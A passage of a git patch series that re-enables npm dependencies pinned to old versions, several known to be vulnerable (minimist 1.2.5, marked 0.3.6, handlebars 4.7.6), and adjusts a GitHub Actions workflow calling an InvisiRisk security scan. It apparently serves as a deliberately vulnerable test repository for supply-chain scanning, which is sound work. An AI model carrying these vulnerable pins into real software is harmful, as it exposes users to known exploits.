"1.3.5", - # "handlebars": "4.7.6", - #"marked": "0.3.6", - # "merge-deep": "3.0.2", - # "minimist": "1.2.5", - #"q": "1.5.1", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.3.6", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + "q": "1.5.1", "underscore": "1.10.2", "yargs-parser": "20.2.2", "jquery": "3.5.1", From c76a953951b20ea41ce220d8d9d782bd96ef1bb4 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 14:18:23 +0545 Subject: [PATCH 88/89] Update build.yml --- .github/workflows/build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 064682b..fbc9771 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -17,7 +17,7 @@ jobs: uses: invisirisk/pse-action@dev-test with: api_url: "https://app.dev.invisirisk.com" - app_token: ${{ secrets.IR_API_KEY } + app_token: ${{ secrets.IR_API_KEY }} - name: Use npm uses: actions/setup-node@v4 From fcbee8fc99501ff1f6e4bb3e105714f6eb03d77c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 13 May 2025 14:20:34 +0545 Subject: [PATCH 89/89] Update build.yml --- .github/workflows/build.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index fbc9771..b7336dd 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -16,7 +16,7 @@ jobs: - name: Setup PSE uses: invisirisk/pse-action@dev-test with: - api_url: "https://app.dev.invisirisk.com" + api_url: "https://app.stage.invisirisk.com" app_token: ${{ secrets.IR_API_KEY }} - name: Use npm